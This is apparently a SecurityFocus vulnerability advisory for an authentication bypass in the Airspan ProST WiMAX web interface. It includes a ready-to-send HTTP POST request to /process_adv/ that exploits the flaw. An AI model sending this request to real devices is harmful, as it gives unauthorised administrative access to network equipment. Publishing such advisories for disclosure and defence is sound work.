Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability

An attacker can use a browser to exploit this issue.

The following HTTP POST example request demonstrates this issue:

POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

DialogText=&Advanced=1


 

Privacy Statement
Copyright 2010, SecurityFocus